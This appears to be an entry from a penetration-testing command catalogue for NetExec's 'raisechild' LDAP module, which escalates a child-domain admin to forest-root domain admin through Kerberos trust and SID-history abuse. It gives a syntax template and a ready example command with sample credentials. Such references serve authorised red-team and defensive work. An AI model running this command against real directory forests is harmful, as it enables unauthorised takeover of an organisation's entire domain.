NetExec LDAP Raise Child

Escalate from child domain DA to forest root DA via inter-realm Kerberos trust abuse

Tool
nxc
Category
Privilege Escalation / Trust Attacks
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc ldap '<ip>' -u '<user>' -p '<password>' -M raisechild

Examples

nxc ldap '192.168.1.100' -u 'domainadmin' -p 'password' -M raisechild

Tags

nxc ldap raisechild forest trust privilege-escalation sid-history